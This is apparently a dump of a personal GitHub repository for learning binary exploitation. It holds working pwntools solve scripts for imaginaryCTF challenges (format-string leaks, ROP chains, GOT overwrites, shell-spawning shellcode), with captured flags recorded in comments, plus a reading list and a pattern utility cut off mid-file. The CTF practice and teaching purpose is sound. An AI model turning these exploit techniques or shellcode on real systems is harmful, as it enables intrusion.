├── Advanced Stack based Binary exploitation for CTFs.pdf ├── CTF ├── imaginaryCTF-daily │ ├── july_22 │ │ └── pwn │ │ │ ├── ESCHEW_five │ │ │ ├── club │ │ │ └── solve.py │ │ │ ├── README.md │ │ │ ├── blind │ │ │ ├── ld-2.31.so │ │ │ ├── libc-2.31.so │ │ │ ├── libc.so.6 │ │ │ ├── solve.py │ │ │ └── vuln │ │ │ ├── dont-syscall-me │ │ │ ├── solve.py │ │ │ └── vuln │ │ │ ├── notepad_pwn │ │ │ ├── notepad │ │ │ └── solve.py │ │ │ └── re-blinded │ │ │ ├── ld-2.31.so │ │ │ ├── libc-2.31.so │ │ │ ├── libc.so.6 │ │ │ ├── solve.py │ │ │ └── vuln │ └── june_22 │ │ └── pwn │ │ ├── README.md │ │ ├── easy_pwn2 │ │ └── solve.py │ │ ├── links_1 │ │ ├── flag.txt │ │ ├── links1 │ │ └── solve.py │ │ ├── links_2 │ │ ├── links2 │ │ └── solve.py │ │ └── links_3 │ │ ├── links3 │ │ └── solve.py └── imaginaryCTF2022 │ └── pwn │ └── bellcode │ ├── bellcode │ └── solve.py ├── GetRidofC2.md ├── Hack.lu_2024.pdf ├── README.md ├── STACK BASED EXPLOITATION.pdf ├── logo.png ├── pattern.py ├── protostar ├── format │ ├── 0format.exp │ ├── 1format.py │ ├── 2format.py │ ├── 3format.py │ ├── 4format.py │ └── challenge binaries │ │ ├── format0 │ │ ├── format1 │ │ ├── format2 │ │ ├── format3 │ │ └── format4 └── stack │ ├── challenge binaries │ ├── stack0 │ ├── stack1 │ ├── stack2 │ ├── stack3 │ ├── stack4 │ ├── stack5 │ ├── stack6 │ └── stack7 │ ├── stack0.py │ ├── stack1.exp │ ├── stack2.exp │ ├── stack3.py │ ├── stack4.exp │ ├── stack5.py │ ├── stack6.py │ └── stack7.py ├── pwn 101 TamilCTF session.pdf ├── pwn101 banner.png ├── pwncode.py ├── random_pwn_challs ├── ret2dlresolve │ └── seccon_2021_kasu_bof.py └── sigrop │ └── DarkCon_2021_easy_rop.py ├── roadmap.md └── stack_master ├── README.md └── easy-rop ├── easy-rop └── exploit.py /Advanced Stack based Binary exploitation for CTFs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/Advanced Stack based Binary exploitation for CTFs.pdf -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/ESCHEW_five/club: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/ESCHEW_five/club -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/ESCHEW_five/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('club') 4 | p = elf.process() 5 | p = remote('puzzler7.imaginaryctf.org',3003) 6 | rop = ROP(elf) 7 | p.recv() 8 | p.sendline('%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%p') 9 | leak = p.recvuntil('0x') 10 | canary = int( b'0x0'+ p.recv(16),16) 11 | # payload 12 | 13 | payload = b'A'*72 14 | payload += p64(canary) 15 | payload += b'A'*8 16 | payload += p64(rop.find_gadget(['ret'])[0]) 17 | payload += p64(elf.sym.win) 18 | 19 | p.sendline(payload) 20 | p.interactive() -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/README.md: -------------------------------------------------------------------------------- 1 | ![](https://i.imgur.com/6Qfwrne.png) 2 | 3 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/blind/ld-2.31.so -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/libc-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/blind/libc-2.31.so -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/blind/libc.so.6 -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF('vuln',checksec=False) 5 | rop = ROP(elf) 6 | p = elf.process() 7 | p = remote('blind.chal.imaginaryctf.org',1337) 8 | ## pwncode[H4ppy_pWn1nG] 9 | 10 | # gadgets 11 | gadg_3d = 0x000000000040111c # add dword ptr [rbp - 0x3d], ebx 12 | csu = 0x00000000004011ca 13 | one_gadget_minus_read = -173250 14 | 15 | payload = flat( 16 | 'A'*40, 17 | csu, 18 | one_gadget_minus_read, 19 | elf.got['read']+0x3d, 20 | 0,0,0,0, 21 | gadg_3d, 22 | elf.sym['read'] 23 | ) 24 | 25 | p.sendline(payload) 26 | p.interactive() -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/blind/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/blind/vuln -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/dont-syscall-me/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF('vuln',checksec=False) 5 | p = elf.process() 6 | p = remote('dont-syscall-me.chal.imaginaryctf.org',1337) 7 | 8 | shellcode = asm(''' 9 | lea r8,[rip]+0x3000 # near ld .text section 10 | 11 | search_syscall: 12 | mov r11,0x4d2 13 | add r11,0x3d # search syscall gadget opcode 14 | cmp word ptr[r8],r11w 15 | je get_shell 16 | inc r8 17 | jmp search_syscall 18 | 19 | get_shell: 20 | mov rax,0x3b 21 | lea rdi,[rip+sh] 22 | jmp r8 # syscall 23 | 24 | sh: 25 | .ascii "/bin/sh" 26 | ''') 27 | 28 | print(len(shellcode)) 29 | p.send(shellcode) 30 | p.interactive() # ictf{sc4nn1ng_thrU_m3m0ry} -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/dont-syscall-me/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/dont-syscall-me/vuln -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/notepad_pwn/notepad: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/notepad_pwn/notepad -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/notepad_pwn/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('notepad',checksec=False) 4 | rop = ROP(elf) 5 | p = elf.process() 6 | p = remote('puzzler7.imaginaryctf.org',3001) 7 | 8 | payload = p64(rop.find_gadget(['ret'])[0]) 9 | payload += p64(elf.sym.win) 10 | 11 | p.sendlineafter('>>>','2') 12 | p.sendlineafter('>>>','-24') 13 | p.sendlineafter('>>>',payload) 14 | 15 | p.interactive() 16 | 17 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/ld-2.31.so -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/libc-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/libc-2.31.so -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/libc.so.6 -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF('vuln',checksec=False) 5 | rop = ROP(elf) 6 | p = elf.process() 7 | ## pwncode[H4ppy_pWn1nG] 8 | 9 | # gadgets 10 | gadg_3d = 0x40113c # add dword ptr [rbp - 0x3d], ebx 11 | csu = 0x00000000004011fa 12 | one_gadget_minus_read = -173250 13 | 14 | payload = flat( 15 | 'A'*40, 16 | csu, 17 | one_gadget_minus_read, 18 | elf.got['read']+0x3d, 19 | 0,0,0,0, 20 | gadg_3d, 21 | elf.sym['read'] 22 | ) 23 | 24 | p.sendline(payload) 25 | p.interactive() -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/july_22/pwn/re-blinded/vuln -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/README.md: -------------------------------------------------------------------------------- 1 | ![](https://i.imgur.com/CgEbBgT.png) 2 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/easy_pwn2/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # p = remote('puzzler7.imaginaryctf.org',2001) 4 | # context.log_level = "CRITICAL" 5 | 6 | for i in range(1,100): 7 | p = remote('puzzler7.imaginaryctf.org',2001) 8 | p.sendlineafter('something',f'%{i}$p') 9 | leak = p.recvuntil('What').split()[0].decode('latin-1') 10 | print(f'[{i}] => {leak}') 11 | # log.critical('yesss') 12 | p.close() 13 | 14 | ''' 15 | [6] => 0x5f73315f73316874 16 | [7] => 0x726333735f336874 17 | [8] => 0xa7474747433 18 | ''' 19 | 20 | # ictf{3asy_f0rm4t_str1ng_vuln} -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_1/flag.txt: -------------------------------------------------------------------------------- 1 | flag{now_on_server} 2 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_1/links1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/june_22/pwn/links_1/links1 -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_1/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('links1') 4 | p = elf.process() 5 | rop = ROP(elf) 6 | 7 | #p = remote('puzzler7.imaginaryctf.org',2004) 8 | 9 | p.sendlineafter('>>>','2') 10 | p.sendlineafter('>>>','0') 11 | p.sendlineafter('>>>','jo') 12 | p.sendlineafter('>>>','2') 13 | p.sendlineafter('>>>','1') 14 | p.sendlineafter('>>>','pugal') 15 | p.sendlineafter('>>>','2') 16 | p.sendlineafter('>>>','0') 17 | 18 | payload = b'A'*64 19 | payload += p64(0x4040C0) 20 | 21 | p.sendlineafter('>>>',payload) 22 | log.warning('choose option 1 and exit immediately') 23 | p.recvuntil('>>>') 24 | p.interactive() 25 | 26 | # ictf{arbitrary_read_ftw_d52a23c3} 27 | 28 | # flag stored at: 0x4040C0 29 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_2/links2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/june_22/pwn/links_2/links2 -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_2/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('links2') 4 | p = elf.process() 5 | #p = remote('puzzler7.imaginaryctf.org',2007) 6 | 7 | #### functions 8 | def view(): 9 | p.sendlineafter('>>>','1') 10 | 11 | def write(index,value): 12 | p.sendlineafter('>>>','2') 13 | p.sendlineafter('>>>',index) 14 | p.sendlineafter('>>>',value) 15 | 16 | def view_time(): 17 | p.sendlineafter('>>>','3') 18 | 19 | # PAYLOAD 20 | write('0','/bin/sh\x00') # writing bin sh in 0th index 21 | write('1','B'*64) 22 | write('2','C'*64) 23 | 24 | ## overwrite next 25 | payload = b'D'*64 26 | payload += p64(elf.got['fgets']) 27 | write('1',payload) # overwriting 1 st value's next with fgets got 28 | write('2',p64(elf.sym['system'])) # now the seccond value we write will be stored in fgets got 29 | 30 | ## shell 31 | p.sendline('2') # calling write() 32 | p.sendline('0') # we're giving 0, coz our /bin/sh is in 0th index 33 | # now it calls fgets with the value in index 0 34 | # so we can execute system('/bin/sh') 35 | p.interactive() 36 | 37 | # ictf{who_knew_the_current_date_could_be_so_dangerous?} 38 | -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_3/links3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF-daily/june_22/pwn/links_3/links3 -------------------------------------------------------------------------------- /CTF/imaginaryCTF-daily/june_22/pwn/links_3/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('links3',checksec=False) 4 | libc = elf.libc 5 | p = elf.process() 6 | 7 | def write(index,value): 8 | p.sendlineafter('>>>','2') 9 | p.sendlineafter('>>>',index) 10 | p.sendlineafter('>>>',value) 11 | 12 | 13 | ### create few allocations 14 | log.info('creating 3 allocations') 15 | write('0','/bin/sh\x00') 16 | write('1','B'*8) 17 | write('2','C'*8) 18 | 19 | #### write next of 1st element with printf 20 | log.info("Overwritting 2nd element's next pointer with printf got address") 21 | payload = b'C'*64 22 | payload += p64(elf.got['printf']) 23 | write('1',payload) 24 | 25 | # leak 26 | log.info('leaking plt address of printf') 27 | p.sendlineafter('>>>','1') 28 | leak = p.recvuntil('\x7f').split()[-1]+b'\x00\x00' 29 | leak = u64(leak) 30 | libc_base = leak - libc.sym['printf'] 31 | log.success(f'printf leak: {hex(leak)}') 32 | log.info('calculating libc base') 33 | log.success(f'libc base: {hex(libc_base)}') 34 | 35 | # overwtite 1st element's next with fgets 36 | log.info("Overwritting 2nd element's next pointer with fgets got address") 37 | payload = b'C'*64 38 | payload += p64(elf.got['fgets']) 39 | write('1',payload) 40 | 41 | # ovwrite fgets got with system 42 | log.info("Now 2nd element's next points to fgets got") 43 | log.info("If we try to edit the 3rd element then we can modify fgets address") 44 | log.info("Overwritting fgets with system ") 45 | system = libc_base + libc.sym['system'] 46 | write('2',p64(system)) 47 | 48 | # trigger system with 0th index 49 | # now it executes system('/bin/sh') -> coz we wrote /bin/sh in 0th index 50 | log.info("1st element has '/bin/sh' string") 51 | log.info("Triggering system('/bin/sh') by calling fgets with 1st element") 52 | p.sendlineafter('>>>','2') 53 | p.sendlineafter('>>>','0') 54 | p.interactive() -------------------------------------------------------------------------------- /CTF/imaginaryCTF2022/pwn/bellcode/bellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/CTF/imaginaryCTF2022/pwn/bellcode/bellcode -------------------------------------------------------------------------------- /CTF/imaginaryCTF2022/pwn/bellcode/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('./bellcode',checksec=False) 4 | p = elf.process() 5 | 6 | shellcode = asm( 7 | 8 | # craft rdx = 0x0 9 | ''' 10 | push rax 11 | pop rdx 12 | ''' + 13 | 14 | 15 | # craft rsi = 0x0 16 | ''' 17 | xchg esi,eax 18 | '''+ 19 | 20 | 21 | # craft bin sh 22 | ''' 23 | // mov rax to 0x0 (r14 has the value 0) 24 | xchg eax,r14d 25 | 26 | // 0x2f - / 27 | dec eax 28 | sub eax,0xfffffaff 29 | sub eax,0xff 30 | sub eax,0xff 31 | sub eax,0xff 32 | sub eax,0xff 33 | sub eax,0xd2 34 | dec eax 35 | dec eax 36 | dec eax 37 | 38 | push rbp 39 | pop rdi 40 | stos BYTE PTR es:[rdi],al 41 | 42 | // 62 - b 43 | sub eax,0xfffffaff 44 | sub eax,0xff 45 | sub eax,0xff 46 | sub eax,0xff 47 | sub eax,0xff 48 | sub eax,0xd2 49 | stos BYTE PTR es:[rdi], al 50 | 51 | // 69 - i 52 | sub eax,0xfffffaff 53 | sub eax,0xff 54 | sub eax,0xff 55 | sub eax,0xff 56 | sub eax,0xff 57 | sub eax,0xfa 58 | dec eax 59 | dec eax 60 | dec eax 61 | dec eax 62 | stos BYTE PTR es:[rdi], al 63 | 64 | // 6e - n 65 | sub eax,0xfffffaff 66 | sub eax,0xff 67 | sub eax,0xff 68 | sub eax,0xff 69 | sub eax,0xff 70 | sub eax,0xfa 71 | dec eax 72 | dec eax 73 | dec eax 74 | dec eax 75 | dec eax 76 | dec eax 77 | stos BYTE PTR es:[rdi], al 78 | 79 | // 2f - / 80 | dec eax 81 | sub eax,0xfffffaff 82 | sub eax,0xff 83 | sub eax,0xff 84 | sub eax,0xff 85 | sub eax,0xff 86 | sub eax,0xff 87 | '''+''' 88 | dec eax 89 | '''*68 +''' 90 | stos BYTE PTR es:[rdi], al 91 | 92 | // 73 - s 93 | dec eax 94 | sub eax,0xfffffaff 95 | sub eax,0xff 96 | sub eax,0xff 97 | sub eax,0xff 98 | sub eax,0xff 99 | sub eax,0xbe 100 | dec eax 101 | dec eax 102 | stos BYTE PTR es:[rdi], al 103 | 104 | 105 | // 68 - h 106 | dec eax 107 | sub eax,0xfffffaff 108 | sub eax,0xff 109 | sub eax,0xff 110 | sub eax,0xff 111 | sub eax,0xff 112 | sub eax,0xbe 113 | '''+''' 114 | dec eax 115 | '''*81+''' 116 | stos BYTE PTR es:[rdi], al 117 | 118 | push rbp 119 | pop rdi 120 | '''+ 121 | 122 | # set rax to 0x3b 123 | ''' 124 | dec eax 125 | '''*45 + 126 | 127 | ### Everything is set, make a syscall!!! 128 | ''' 129 | syscall 130 | ''' 131 | ) 132 | 133 | print(disasm(shellcode)) 134 | 135 | # check 136 | for byte in shellcode: 137 | if byte % 5: 138 | log.critical(f'invalid byte {hex(byte)}') 139 | exit() 140 | 141 | # p.interactive('OPEN GDB ') 142 | 143 | p = remote('bellcode.chal.imaginaryctf.org',1337) 144 | p.sendline(shellcode) 145 | p.interactive() 146 | -------------------------------------------------------------------------------- /GetRidofC2.md: -------------------------------------------------------------------------------- 1 | # Python 3 encoding problems 2 | 3 | Here I'm gonna say the solution to one of the python3 encoding problem (C2) 4 | 5 | ### Ok what's C2? 6 | 7 | ![img1](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(707).png) 8 | 9 | Here I've created an exploit with python3, but the exploit not working :/ 10 | Let's analyse this... 11 | 12 | 13 | ![img2](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(708).png) 14 | 15 | Our exploit not working coz we have C2 before every bytes, Python3 has some encoding issues we need to change something in this to encode it correctly. 16 | 17 | 18 | ### Same exploit on python2 19 | 20 | ![img3](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(709).png) 21 | 22 | See here python2 has no issues in this, however we can use python2 but I'm a user of python3 so it takes some extra time for me to code in python2. 23 | Also I have issues in some python2 modules too :/ 24 | 25 | 26 | ## FIX 27 | 28 | ![img4](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(710).png) 29 | 30 | Now here we're fixing the issue by specifying `encode('latin-1')` and using `sys.stdout.buffer.write()` instead of print() 31 | 32 | Coz print has some issues in this, It'll print the encoded payload within `b' '` so our payload will be messed up :/ 33 | 34 | 35 | ![img5](https://github.com/jopraveen/jopraveen/blob/main/xdev-imgs/Screenshot%20(711).png) 36 | 37 | 38 | See now here no more c2 :) 39 | 40 | I hope this will be helpful to you while doing binary exploitation :) 41 | -------------------------------------------------------------------------------- /Hack.lu_2024.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/Hack.lu_2024.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![banner](https://github.com/jopraveen/exploit-development/raw/main/pwn101%20banner.png) 2 | 3 | I'll post some resources,writeups,exploits,source-codes in this repo 4 | 5 | ### Highly recommended site to learn/practice pwn : **https://dojo.pwn.college/** 6 | 7 | ### Blogs:- 8 | * https://www.cs.wcupa.edu/schen/security/ 9 | * https://www.bordergate.co.uk/category/exploit-dev/ 10 | * https://ir0nstone.gitbook.io/notes/ 11 | * https://guyinatuxedo.github.io/index.html 12 | * https://heap-exploitation.dhavalkapil.com/ 13 | * https://github.com/AidenPearce369/pwnable.kr 14 | * https://github.com/AidenPearce369/ExploitDev 15 | * https://github.com/AidenPearce369/phoenix 16 | * https://faraz.faith/ 17 | * https://d4mianwayne.github.io/ 18 | * https://wiki.bi0s.in/pwning/roadmap/ 19 | * https://blog.skullsecurity.org/category/ctfs 20 | * https://sploitfun.wordpress.com/ 21 | * https://ret2rop.blogspot.com/ 22 | * https://blog.fxiao.me/how-to-heap/ 23 | * https://www.youtube.com/watch?v=6-Et7M7qJJg 24 | 25 | #### Heap Exploitation 26 | 27 | * https://0x434b.dev/overview-of-glibc-heap-exploitation-techniques/ 28 | * https://ir0nstone.gitbook.io/notes/types/heap/introduction-to-the-heap 29 | * https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-part-1-515b3621e0e8 30 | * https://youtu.be/HPDBOhiKaD8 31 | * https://www.0x0ff.info/2014/heap-based-buffer-overflow/ 32 | * https://youtu.be/woKGxIrKFBc 33 | * https://devel0pment.de/?p=688 34 | * https://sensepost.com/blog/2018/linux-heap-exploitation-intro-series-set-you-free-part-1/ 35 | * https://courseupload.com/linux-heap-exploitation-200321/ 36 | * https://heap-exploitation.dhavalkapil.com/ 37 | * http://blog.fxiao.me/how-to-heap/ 38 | * https://youtu.be/nnF4Avttbns 39 | * https://youtu.be/A-Qf_Q_AeFw 40 | * https://www.youtube.com/watch?v=PFqEKkj7wWs 41 | 42 | #### Kernel exploitation 43 | 44 | * https://github.com/xairy/linux-kernel-exploitation/blob/master/README.md 45 | * https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part4.html 46 | * https://github.com/pr0cf5/kernel-exploit-practice/tree/master/bypass-smep 47 | * https://arjunsreedharan.org/post/82710718100/kernel-101-lets-write-a-kernel 48 | * https://web.archive.org/web/20171029060939/http://www.blackbunny.io/linux-kernel-x86-64-bypass-smep-kaslr-kptr_restric/ 49 | * https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-1/ 50 | * https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-2/ 51 | 52 | #### Browser exploit 53 | 54 | * https://youtube.com/playlist?list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t 55 | * https://blog.ret2.io/2018/06/05/pwn2own-2018-exploit-development/ 56 | * https://github.com/Escapingbug/awesome-browser-exploit 57 | * https://youtu.be/3szZpS58Dqg 58 | * https://github.com/Geluchat/chrome_v8_exploit 59 | 60 | ### Youtube:- 61 | 62 | * https://youtube.com/playlist?list=PLiCcguURxSpbD9M0ha-Mvs-vLYt-VKlWt 63 | * https://www.youtube.com/c/pwncollege/playlists 64 | * https://youtube.com/playlist?list=PL1H1sBF1VAKVg451vJ-rx0y_ZuQMHPamH 65 | * https://www.youtube.com/channel/UCi-IXmtQLrJjg5Ji78DqvAg/videos 66 | * https://youtube.com/playlist?list=PLhy9gU5W1fvUND_5mdpbNVHC1WCIaABbP 67 | * https://www.youtube.com/c/BasteG0d69/videos 68 | * https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN 69 | * https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A 70 | * https://www.youtube.com/playlist?list=PLeSXUd883dhjnFXPf2QA0KnUnJnn9dPWy 71 | * https://www.youtube.com/playlist?list=PLHUKi1UlEgOKAVRdiMlpX6hgayiY6dTwu 72 | 73 | ### Wargames:- 74 | 75 | * http://pwnable.kr/ 76 | * http://pwnable.tw/ 77 | * http://pwn.eonew.cn 78 | * https://www.root-me.org/?lang=en 79 | * http://smashthestack.org/ 80 | * https://exploit.education/ 81 | 82 | 83 | ### Pwn Related Stuffs:- 84 | 85 | * How2Heap - https://github.com/shellphish/how2heap 86 | 87 | * Tips & Trics - https://karol-mazurek95.medium.com/pwn-tips-tricks-linux-d10186e8580e 88 | 89 | * PwnTips - https://github.com/Naetw/CTF-pwn-tips 90 | 91 | * Quick guide -https://trailofbits.github.io/ctf/exploits/binary1.html 92 | 93 | * Course materials for Modern Binary Exploitation by RPISEC - https://github.com/RPISEC/MBE 94 | 95 | * Learn ROP - https://ropemporium.com/ 96 | 97 | * For Linux binary Exploitation - https://github.com/scwuaptx/HITCON-Training 98 | 99 | * Intro to binary exploitation / reverse engineering course - https://guyinatuxedo.github.io/ 100 | 101 | * A collection of pwn/CTF related utilities for Ghidra - https://github.com/0xb0bb/pwndra 102 | 103 | * Some pwn challenges selected for training and education. - https://github.com/BrieflyX/ctf-pwns 104 | 105 | * A set of Linux binary exploitation tasks for beginners on various architectures - https://github.com/xairy/easy-linux-pwn 106 | 107 | * ASM Basics - https://asmtutor.com/#lesson1 108 | 109 | --=[ SOME GAME HACKING CTFs]==- 110 | * https://github.com/mrT4ntr4/CTF-Game-Challenges 111 | 112 | Credits: 113 | Thanks for all open source contributers 114 | -------------------------------------------------------------------------------- /STACK BASED EXPLOITATION.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/STACK BASED EXPLOITATION.pdf -------------------------------------------------------------------------------- /logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/logo.png -------------------------------------------------------------------------------- /pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | 5 | try: 6 | import clipboard 7 | except ImportError: 8 | pass 9 | from string import ascii_uppercase, ascii_lowercase, digits 10 | 11 | MAX_PATTERN_LENGTH = 20280 12 | 13 | 14 | class MaxLengthException(Exception): 15 | pass 16 | 17 | 18 | class WasNotFoundException(Exception): 19 | pass 20 | 21 | 22 | def pattern_gen(length): 23 | """ 24 | Generate a pattern of a given length up to a maximum 25 | of 20280 - after this the pattern would repeat 26 | """ 27 | if length >= MAX_PATTERN_LENGTH: 28 | raise MaxLengthException( 29 | "ERROR: Pattern length exceeds " "maximum of {0}".format(MAX_PATTERN_LENGTH) 30 | ) 31 | 32 | pattern = "" 33 | for upper in ascii_uppercase: 34 | for lower in ascii_lowercase: 35 | for digit in digits: 36 | if len(pattern) < length: 37 | pattern += upper + lower + digit 38 | 39 | else: 40 | out = pattern[:length] 41 | return out 42 | 43 | 44 | def pattern_search(search_pattern): 45 | """ 46 | Search for search_pattern in pattern. Convert from hex if needed 47 | Looking for needle in haystack 48 | """ 49 | needle = search_pattern 50 | 51 | try: 52 | if needle.startswith("0x"): 53 | # Strip off '0x', convert to ASCII and reverse 54 | needle = needle[2:] 55 | needle = bytearray.fromhex(needle).decode("ascii") 56 | needle = needle[::-1] 57 | except (ValueError, TypeError) as e: 58 | raise 59 | 60 | haystack = "" 61 | for upper in ascii_uppercase: 62 | for lower in ascii_lowercase: 63 | for digit in digits: 64 | haystack += upper + lower + digit 65 | found_at = haystack.find(needle) 66 | if found_at > -1: 67 | return found_at 68 | 69 | raise WasNotFoundException( 70 | "Couldn`t find {0} ({1}) " 71 | "anywhere in the pattern.".format(search_pattern, needle) 72 | ) 73 | 74 | 75 | def print_help(): 76 | print("Usage: {0} [LENGTH|PATTERN]\n".format(sys.argv[0])) 77 | print("Generate a pattern of length LENGTH or search for PATTERN and ") 78 | print("return its position in the pattern.\n") 79 | 80 | 81 | if __name__ == "__main__": 82 | if len(sys.argv) < 2: 83 | print_help() 84 | sys.exit(0) 85 | 86 | if sys.argv[1] == "-h" or sys.argv[1] == "--help": 87 | print_help() 88 | sys.exit(0) 89 | 90 | if sys.argv[1].isdigit(): 91 | try: 92 | pat = pattern_gen(int(sys.argv[1])) 93 | try: 94 | clipboard.copy(pat) 95 | print("Pattern copied to clipboard: \n") 96 | except NameError: 97 | pass 98 | 99 | print(pat) 100 | 101 | except MaxLengthException as e: 102 | print(e) 103 | else: 104 | try: 105 | found = pattern_search(sys.argv[1]) 106 | print( 107 | "Pattern {0} first occurrence at 